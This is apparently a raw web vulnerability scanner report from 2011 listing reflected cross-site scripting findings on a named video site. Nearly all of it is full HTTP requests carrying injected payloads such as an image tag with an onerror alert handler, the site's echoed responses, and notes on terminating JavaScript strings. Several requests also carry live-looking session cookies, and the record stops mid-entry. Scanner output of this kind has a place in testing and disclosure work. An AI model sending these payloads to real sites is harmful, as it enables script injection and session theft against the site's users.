<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure2e455<img src=a onerror=alert(1)>cd67645eb41"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a478'%3b93eafa27de4 was submitted in the REST URL parameter 6. This input was echoed as 3a478';93eafa27de4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j83a478'%3b93eafa27de4/x22 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=D47A8979-9A2D-F75C-94BC-F44EB9A27CFA&LastUpdate=03/Feb/2011:12:32:06 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:32:06 GMT; Path=/ Date: Thu, 03 Feb 2011 20:32:07 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=35 Content-Length: 94943
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 19a20<img%20src%3da%20onerror%3dalert(1)>17a886b7f9 was submitted in the REST URL parameter 4. This input was echoed as 19a20<img src=a onerror=alert(1)>17a886b7f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure19a20<img%20src%3da%20onerror%3dalert(1)>17a886b7f9/watch/v18978294NGnK88j8/x26amp HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=E878E920-D63B-9E1C-A81F-F0235D74FE12&LastUpdate=03/Feb/2011:12:31:53 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:53 GMT; Path=/ Date: Thu, 03 Feb 2011 20:31:53 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=96 Content-Length: 76397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure19a20<img src=a onerror=alert(1)>17a886b7f9"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4957f"><img%20src%3da%20onerror%3dalert(1)>b411440d815 was submitted in the REST URL parameter 4. This input was echoed as 4957f"><img src=a onerror=alert(1)>b411440d815 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure4957f"><img%20src%3da%20onerror%3dalert(1)>b411440d815/watch/v18978294NGnK88j8/x26amp HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:38 GMT; Path=/ Date: Thu, 03 Feb 2011 20:31:38 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=91 Content-Length: 76451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure4957f"><img src=a onerror=alert(1)>b411440d815/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8770d'%3bee4aadffdc5 was submitted in the REST URL parameter 6. This input was echoed as 8770d';ee4aadffdc5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j88770d'%3bee4aadffdc5/x26amp HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=FED204EF-9DC2-336D-4AB6-05EAB5021E64&LastUpdate=03/Feb/2011:12:32:04 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:32:04 GMT; Path=/ Date: Thu, 03 Feb 2011 20:32:05 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=67 Content-Length: 94943
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5c238<img%20src%3da%20onerror%3dalert(1)>411e688a8fb was submitted in the REST URL parameter 4. This input was echoed as 5c238<img src=a onerror=alert(1)>411e688a8fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure5c238<img%20src%3da%20onerror%3dalert(1)>411e688a8fb/watch/v207484775fTsGMdN HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:48 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=56 Content-Length: 75674
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure5c238<img src=a onerror=alert(1)>411e688a8fb"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bcf1"><img%20src%3da%20onerror%3dalert(1)>d1e7de81cf0 was submitted in the REST URL parameter 4. This input was echoed as 3bcf1"><img src=a onerror=alert(1)>d1e7de81cf0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure3bcf1"><img%20src%3da%20onerror%3dalert(1)>d1e7de81cf0/watch/v207484775fTsGMdN HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:09 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=33 Content-Length: 75718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure3bcf1"><img src=a onerror=alert(1)>d1e7de81cf0/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47a62'%3b78d21d340d1 was submitted in the REST URL parameter 6. This input was echoed as 47a62';78d21d340d1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v207484775fTsGMdN47a62'%3b78d21d340d1 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:58 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=80 Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43948"><img%20src%3da%20onerror%3dalert(1)>46bf4b641b6 was submitted in the REST URL parameter 4. This input was echoed as 43948"><img src=a onerror=alert(1)>46bf4b641b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure43948"><img%20src%3da%20onerror%3dalert(1)>46bf4b641b6/watch/v207490874eKBjfZC HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:11 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=69 Content-Length: 75718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure43948"><img src=a onerror=alert(1)>46bf4b641b6/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89285<img%20src%3da%20onerror%3dalert(1)>bd2cbbace72 was submitted in the REST URL parameter 4. This input was echoed as 89285<img src=a onerror=alert(1)>bd2cbbace72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure89285<img%20src%3da%20onerror%3dalert(1)>bd2cbbace72/watch/v207490874eKBjfZC HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:34 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=99 Content-Length: 75674
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure89285<img src=a onerror=alert(1)>bd2cbbace72"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1503'%3b3c33fe8edd6 was submitted in the REST URL parameter 6. This input was echoed as a1503';3c33fe8edd6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v207490874eKBjfZCa1503'%3b3c33fe8edd6 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:45 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=97 Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb7a9"><img%20src%3da%20onerror%3dalert(1)>a20cb2010f8 was submitted in the REST URL parameter 4. This input was echoed as fb7a9"><img src=a onerror=alert(1)>a20cb2010f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurefb7a9"><img%20src%3da%20onerror%3dalert(1)>a20cb2010f8/watch/v20749145FCR2QekA HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:36:05 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=95 Content-Length: 75718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventurefb7a9"><img src=a onerror=alert(1)>a20cb2010f8/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 267b0<img%20src%3da%20onerror%3dalert(1)>f093e2717f1 was submitted in the REST URL parameter 4. This input was echoed as 267b0<img src=a onerror=alert(1)>f093e2717f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure267b0<img%20src%3da%20onerror%3dalert(1)>f093e2717f1/watch/v20749145FCR2QekA HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:39 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=47 Content-Length: 75674
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure267b0<img src=a onerror=alert(1)>f093e2717f1"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9339'%3bd4a836c8b6c was submitted in the REST URL parameter 6. This input was echoed as a9339';d4a836c8b6c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20749145FCR2QekAa9339'%3bd4a836c8b6c HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:16 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=14 Content-Length: 94049
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e2bc5<img%20src%3da%20onerror%3dalert(1)>20ab6849576 was submitted in the REST URL parameter 4. This input was echoed as e2bc5<img src=a onerror=alert(1)>20ab6849576 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventuree2bc5<img%20src%3da%20onerror%3dalert(1)>20ab6849576/watch/v20753891TQ237Z7N HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:35 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=88 Content-Length: 76304
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuree2bc5<img src=a onerror=alert(1)>20ab6849576"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8887d"><img%20src%3da%20onerror%3dalert(1)>d7d3c7b55c9 was submitted in the REST URL parameter 4. This input was echoed as 8887d"><img src=a onerror=alert(1)>d7d3c7b55c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
